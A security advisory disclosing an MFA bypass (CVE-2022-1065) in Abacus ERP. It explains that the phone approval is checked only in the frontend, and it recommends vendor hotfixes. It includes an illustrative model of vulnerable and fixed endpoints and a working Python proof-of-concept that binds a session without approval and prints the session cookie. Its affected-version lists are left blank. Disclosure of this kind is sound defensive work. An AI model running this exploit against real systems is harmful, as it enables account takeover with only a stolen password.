Apr 15, 2022 by Roman Gribi
During our penetration testing projects we regularly discover relevant vulnerabilities. Read here how we published this vulnerability as a CVE [4] in cooperation with the manufacturer.
Abacus is an owner-managed Swiss software company that employs around 600 people. For over three decades it has developed successful business software [1].
This advisory describes a vulnerability affecting various versions of the Abacus ERP software. The vulnerability lies within the authentication process of Abacus and allows an attacker to bypass the second factor. It is therefore possible to gain access to the system with knowledge of a valid username / password combination only, which weakens the overall security level of the authentication [2].
The attack has been successfully tested against the following version:
According to vendor information, the following versions are vulnerable as well:
According to vendor information, the following versions are not vulnerable:
The application supports multi-factor authentication (MFA) to further strengthen the authentication process. After a user enters valid credentials, a request is sent to the registered Abacus Access app on the mobile device of the user. The user then has to approve the login request before a redirect to the system is performed. However, the approval the user has given on the mobile phone is only validated in the frontend and not by the backend. Because of that, this step can be bypassed by simply skipping the validation.
The following steps are passed during the authentication process:
1. The user accesses the page ‘/portal/myabacus’
2. The server creates a new session cookie and automatically redirects the user to ‘/oauth/oauth2/v1/auth’
3. The user enters valid credentials, which are sent to ‘/oauth/oauth2/v1/authenticate’
4. If the credentials are valid, the backend system triggers the MFA request to the mobile application
5. Until the user has accepted the MFA request on the mobile device, the frontend part of the application sends regular status requests to the backend system to check whether the user has already confirmed the request
6. Once the MFA request has been confirmed and the backend returns a successful response to the status request, the authenticated session is bound using a request to ‘/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings’
However, in the vulnerable versions, step 5 is only enforced by the frontend and not by the backend. As such, an attacker can simply omit the status request and directly issue the session-binding request from step 6; the backend performs no further verification of the MFA status before binding the session.
Using this approach, it is possible to establish a fully authenticated session by providing only a username / password, without the second authentication factor ever being approved.
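To make the root cause concrete, the following is an added example; it is neither Redguard's proof of concept nor Abacus code. It is a small in-memory model of the authentication backend with the session-binding endpoint of step 6 in two variants: a vulnerable one that trusts the frontend to have polled the status endpoint (step 5) first, and a hardened one that re-checks the approval state on the backend and also verifies that the approval request belongs to the same authentication session. All class, method and field names are hypothetical, and the credential set is constructed.

```python
# Added example (not Redguard's or Abacus's code): a minimal in-memory model of
# the MFA approval flow described in the advisory. All names are hypothetical.
import secrets
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass
class ApprovalRequest:
    user: str
    approved: bool = False  # flipped to True only by the mobile app callback


class AuthBackend:
    def __init__(self) -> None:
        self.auth_sessions: Dict[str, str] = {}          # auth session id -> user
        self.approvals: Dict[str, ApprovalRequest] = {}  # request id -> state
        self.bound: Dict[str, str] = {}                  # browser session -> user

    # Steps 3/4: password check, then create the pending MFA approval request
    def authenticate(self, user: str, password: str,
                     credentials: Dict[str, str]) -> Tuple[str, str]:
        if credentials.get(user) != password:
            raise PermissionError("invalid credentials")
        auth_sid, req_id = secrets.token_hex(8), secrets.token_hex(8)
        self.auth_sessions[auth_sid] = user
        self.approvals[req_id] = ApprovalRequest(user)
        return auth_sid, req_id

    # The mobile app confirms the request out of band
    def mobile_approve(self, req_id: str) -> None:
        self.approvals[req_id].approved = True

    # Step 5: status endpoint polled by the frontend
    def status(self, req_id: str) -> bool:
        return self.approvals[req_id].approved

    # Step 6, vulnerable variant: assumes the frontend only calls this after
    # status() returned True, so it never inspects the approval state itself.
    def bind_vulnerable(self, browser_sid: str, auth_sid: str, req_id: str) -> str:
        user = self.auth_sessions.pop(auth_sid)
        self.approvals.pop(req_id)
        self.bound[browser_sid] = user
        return user

    # Step 6, hardened variant: the backend verifies that the approval request
    # exists, belongs to this authentication session, and has been confirmed.
    def bind_fixed(self, browser_sid: str, auth_sid: str, req_id: str) -> str:
        user = self.auth_sessions.get(auth_sid)
        approval = self.approvals.get(req_id)
        if user is None or approval is None or approval.user != user:
            raise PermissionError("unknown or mismatched auth session / approval")
        if not approval.approved:
            raise PermissionError("MFA approval still pending")
        self.auth_sessions.pop(auth_sid)  # both ids are single-use
        self.approvals.pop(req_id)
        self.bound[browser_sid] = user
        return user


def login_attempt(skip_mfa: bool, fixed: bool) -> str:
    """Run one login against a fresh backend with a constructed credential set.
    Returns 'bound:<user>' if an authenticated session was issued, else 'denied'."""
    backend = AuthBackend()
    creds = {"alice": "correct-horse-battery"}  # constructed sample credential
    auth_sid, req_id = backend.authenticate("alice", "correct-horse-battery", creds)
    if not skip_mfa:
        backend.mobile_approve(req_id)  # user taps "approve" on the phone
        assert backend.status(req_id)   # what an honest frontend polls for
    bind = backend.bind_fixed if fixed else backend.bind_vulnerable
    try:
        return "bound:" + bind("browser-cookie-1", auth_sid, req_id)
    except PermissionError:
        return "denied"


if __name__ == "__main__":
    print("vulnerable, MFA skipped :", login_attempt(skip_mfa=True, fixed=False))
    print("fixed, MFA skipped      :", login_attempt(skip_mfa=True, fixed=True))
    print("fixed, MFA approved     :", login_attempt(skip_mfa=False, fixed=True))
```

The only difference between the two binding endpoints is where the approval state is consulted. In the vulnerable variant the poll in step 5 is purely a frontend convenience, so a client that skips it is indistinguishable from one that waited; in the hardened variant the binding request itself is the authorization decision, and the pairing check between authentication session and approval request prevents an approval from one login from being reused to bind another.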
The following proof of concept issues the requests necessary to obtain a valid session id.
import re
import json
import urllib.parse
from urllib.request import HTTPCookieProcessor, Request, build_opener

# Placeholders (not part of the original PoC): set these for the system under test
BASE_URL = "https://<abacus-host>"   # scheme and host of the Abacus instance
DOMAIN = "<abacus-host>"             # cookie domain as stored in the cookie jar
USERNAME = "<username>"
PASSWORD = "<password>"

cookie_processor = HTTPCookieProcessor()
opener = build_opener(cookie_processor)

# Step 1,2 - Generate Session ID
opener.open(Request(BASE_URL + "/portal/myabacus"))

# Step 3 - Perform login and extract values
data = urllib.parse.urlencode(
    {'username': USERNAME, 'password': PASSWORD}).encode()
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate", data=data)
res = opener.open(req)
raw = res.read().decode('utf-8', errors='replace')
data_auth = re.search('(?<=data-access-token=")[^"]+', raw).group(0)
data_sid = re.search('(?<=data-auth-session-id=")[^"]+', raw).group(0)
data_rid = re.search('(?<=data-approval-request-id=")[^"]+', raw).group(0)

# Step 6 - Bind auth session to session id without requesting MFA status
data = json.dumps(
    {'authenticationSessionId': data_sid, 'approvalRequestId': data_rid}
).encode('utf-8')
req = Request(BASE_URL +
              "/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings")
req.add_header('Authorization', 'Bearer ' + data_auth)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', str(len(data)))
opener.open(req, data=data)

# Do manual redirect in case there is no auto redirect
# This step could be omitted depending on the system configuration
data_code = re.search('(?<=code" value=")[^"]+', raw).group(0)
data_sstate = re.search('(?<=session_state" value=")[^"]+', raw).group(0)
data_state = re.search('(?<="state" value=")[^"]+', raw).group(0)
data = urllib.parse.urlencode(
    {'code': data_code, 'session_state': data_sstate, 'state': data_state}).encode()
req = Request(BASE_URL + "/portal/myabacus/oauthcb", data=data)
opener.open(req)

# Extract cookie (reads the jar's internal _cookies dict: domain -> path -> name)
print("__Secure-MYABACUS_SESSION: " +
      cookie_processor.cookiejar
      ._cookies[DOMAIN]['/portal/myabacus']['__Secure-MYABACUS_SESSION'].value)
Install the available hotfixes and / or service packs dated 2022-01-15 or newer [3].
Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics.
www.redguard.ch
contact@redguard.ch
This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible and indeed likely that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
References
[1] https://www.abacus.ch/unternehmen/portrait
[2] https://owasp.org/www-project-top-ten/2017/A22017-BrokenAuthentication
[3] https://classic.abacus.ch/downloads-page/servicepacks
[4] https://www.cve.org/CVERecord?id=CVE-2022-1065